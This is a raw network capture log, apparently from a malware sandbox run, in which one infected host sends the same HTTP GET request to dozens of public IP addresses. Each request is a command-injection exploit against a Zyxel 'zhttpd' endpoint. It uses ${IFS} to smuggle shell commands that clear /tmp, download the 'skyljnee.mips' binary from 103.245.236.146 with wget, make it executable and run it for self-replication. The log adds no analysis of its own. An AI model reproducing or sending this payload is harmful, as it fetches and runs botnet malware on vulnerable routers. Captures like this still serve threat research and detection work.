                                                Jan 28, 2024 10:16:39.022497892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8058192.168.2.234649260.123.186.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022552967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8059192.168.2.2346786113.120.119.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022567034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8060192.168.2.2337866221.199.236.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022591114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8061192.168.2.2355564176.70.142.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022631884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8062192.168.2.236027865.209.134.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022659063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8063192.168.2.2351184143.134.230.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022691011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8064192.168.2.2353322197.15.8.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022712946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8065192.168.2.234804435.227.49.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022746086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8066192.168.2.2343364149.118.24.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022753000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8067192.168.2.233358269.178.11.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022766113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8068192.168.2.2356224193.78.16.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022804976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8069192.168.2.2333912119.100.26.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022825003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8070192.168.2.234429680.169.87.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022851944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8071192.168.2.2338980169.249.236.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022913933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8072192.168.2.23409348.27.129.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022953033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8073192.168.2.2355096154.105.252.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022953033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8074192.168.2.2333232103.119.188.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022974014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8075192.168.2.2333528109.124.175.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.022994041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8076192.168.2.233901447.34.248.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023011923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8077192.168.2.234344865.25.150.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023049116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8078192.168.2.2354336123.164.153.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023075104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8079192.168.2.2341634216.219.90.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023106098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8080192.168.2.234679835.117.24.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023134947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8081192.168.2.2355218220.39.228.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023154974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8082192.168.2.234606259.177.122.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023164034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8083192.168.2.234896469.9.77.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023188114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8084192.168.2.234133442.22.172.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023202896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8085192.168.2.2337314199.145.21.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023235083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8086192.168.2.235617295.31.93.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023252010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8087192.168.2.233300232.38.20.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023272038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8088192.168.2.2340350157.217.61.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023299932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8089192.168.2.2352162131.60.7.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023325920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8090192.168.2.234500699.228.60.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023341894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8091192.168.2.2360082220.135.195.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023403883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8092192.168.2.234037085.69.251.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023406029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8093192.168.2.2353906159.245.111.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023438931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8094192.168.2.2341280196.116.216.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023474932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8095192.168.2.234493435.238.31.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023488998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8096192.168.2.2352344199.190.6.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023500919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8097192.168.2.2334794171.11.195.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023539066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8098192.168.2.234053468.25.160.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023582935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8099192.168.2.2337702134.242.53.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023583889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8100192.168.2.2333478110.145.2.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023591042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8101192.168.2.234612647.175.227.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023610115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8102192.168.2.2355534199.206.35.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023621082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8103192.168.2.2353460170.118.113.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.023647070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8104192.168.2.2356316106.165.178.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.026241064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8105192.168.2.2338778187.188.238.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.026278973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8106192.168.2.2339082131.24.128.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:39.026320934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8107192.168.2.233775451.241.104.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032294035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8108192.168.2.2345210201.99.174.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032320976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8109192.168.2.235096690.255.117.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032332897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8110192.168.2.2350252170.23.231.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032358885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8111192.168.2.234125479.181.162.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032392979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8112192.168.2.235901062.147.55.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032413960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8113192.168.2.2343902108.76.233.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032438040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8114192.168.2.2346696138.149.196.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032444000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8115192.168.2.2359766203.140.66.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032460928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8116192.168.2.2337844148.114.114.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032475948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8117192.168.2.2355342149.204.11.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032510042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8118192.168.2.2360450175.215.20.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.032568932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8119192.168.2.2338636185.170.122.22443
                                                TimestampBytes transferredDirectionData
